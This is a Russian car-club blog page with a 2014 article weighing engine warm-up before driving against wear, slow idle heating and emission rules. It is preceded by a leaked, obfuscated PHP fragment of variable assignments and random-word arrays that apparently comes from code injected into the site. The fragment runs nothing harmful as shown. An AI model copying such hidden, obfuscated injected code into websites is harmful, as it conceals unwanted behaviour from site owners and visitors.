$O0O0O_O_0_='BEGINJ6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW'; $O__O_0O0O0='archeal3085'; $O_00_0O_OO=1918; $O_00O_O0_O='/BCE/vlD/F'; $O__00O0OO_=155; $O_OO0O0__0=array("leafleteer","jones","directionless","kevel","donatism","miasmatous","haire","inhospitably","ischyodus","aissor","brakesman","epistolizer","fistmele","monongahela","lactiform","angiosporous","mastigure","isodomous","mechanotherapeutic","kerner","conchifera","glis","glomeroporphyritic","indictive","mesophytism","adrenalone","metrocele","lobscouse");; $OOO_O__000='all'; $O0___OO00O='T3'; $O0__0OO_0O='|likeyou|'; ?>  Стоит ли перед началом движения прогревать мотор | Авто клуб

Стоит ли перед началом движения прогревать мотор

19 Июн 2014 | Автор: | Комментариев нет »

Стоит ли перед началом движения прогревать мотор
Так сразу на этот вопрос сложно ответить. При запуске непрогретого двигателя и его работы под высокой нагрузкой быстро изнашиваются детали. Причиной преждевременного износа элементов является их недостаточное смазывание и увеличенные размеры зазоров между ними. Ведь нужный температурный режим, при котором детали расширяются и правильно работают, возможен только после полного прогрева мотора.

В то же время двигатель на холостом ходу будет работать с небольшой тепловой отдачей и нагреваться медленно. Ждать, когда он прогреется, — значит, увеличивать продолжительность его работы в таком неблагоприятном положении.

Медленный прогрев мотора исключает появление небезопасных напряжений температуры, которые часто появляются при быстром прогреве. Каждый знает, что при резком перепаде температуры в моторе часто происходит выход из строя его деталей. Головка блока цилиндров покоробилась, поршень заклинило? Проблема — резкий температурный перепад.

Если у вас современный иностранный автомобиль, то их производители чаще всего следуют экологическим стандартам. По законам европейских стран, нанесение ущерба окружающей среде строго преследуется. Даже, когда поездка с холодным мотором может нанести его элементам вред, то с этим приходится мириться.

В отечественных машинах нужно следовать инструкциям компании-изготовителя. Обычно рекомендуется отправляться в дорогу по достижении мотором температурного уровня, при котором он устойчиво работает без «подсоса» (приблизительно 40- 50 °С).

На машинах с системой впрыска горючего температура отправки в дорогу может быть меньше.

Здесь вы можете написать комментарий к записи "Стоит ли перед началом движения прогревать мотор".

* Обязательные для заполнения поля
Twitter-новости
Наши партнеры
Читать нас
О сайте

Автомобильный портал: новости автомобильного рынка, обзоры, советы автомобилистам.